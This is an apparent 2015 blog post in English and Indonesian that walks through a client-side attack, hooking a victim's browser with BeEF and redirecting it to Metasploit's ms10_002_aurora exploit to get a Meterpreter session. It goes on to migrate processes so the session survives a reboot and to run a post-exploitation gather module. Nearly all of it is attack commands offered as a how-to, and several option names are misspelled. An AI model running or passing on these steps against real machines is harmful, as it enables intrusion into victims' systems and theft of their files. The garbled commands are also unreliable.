Jumat, 28 Agustus 2015

How to combain client side attack with beef

1. Open tools Beef in kali linux applicatio.

2. Click link Here in initial appearence of Beef.

3. Open Terminal to make metasploit for one of  windows application namely ms10_002_aurora.

4. #msfconsole
    >use exploit/windows/browser/ms10_002_aurora
    >show option
    >set RVSHOST 192.168.56.1
    >set RVSPORT 8080
    >set URIPATH meremmelek.mp4
    >set PAYLOAD windows/meterpreter/reserve_tcp_dns
5. show option

6. >set LHOST 192.168.56.1
    >exploit

7. We will get the address of url: http://192.168.56.1:8080/merammelek.mp4 which browse by target

8. saat alamat url: http://192.168.56.1:8080/merammelek.mp4 di browse oleh target makan meterpreter akan terbuka(posisi kita sudah di sistem target)
9.>session l
   >session -i 1
   meterpreter>
10. Kemudian buka halaman beef, klik 2x IP yang terkonek pada online browser kemudian pilih modul direck browser maka akan muncul kotak yang akan kita masukan alamat url: http://192.168.56.1:8080/merammelek.mp4 selanjutnya klik execute.
11. Kemudian segera pindah ke terminal dan ketik
     >ps ( muncul  list system sasaran yg sedang dalam berfungsi )
     >migrate ( pilih angka PID salah satu list tadi )
tujuan nya adalah agar saat target mematikan system nya kemudian di hidupkan kembali, posisi kita masih tetap berada di system target tsb.

12. Pada posisi meterpreter berarti kita sudah dapat mengexploit system target. salah satunya perintah :
meterprete>run post/windows/gather/enum_hostfile enter
artinya : kita menjalankan perintah untuk mendownload file




Tidak ada komentar:

Posting Komentar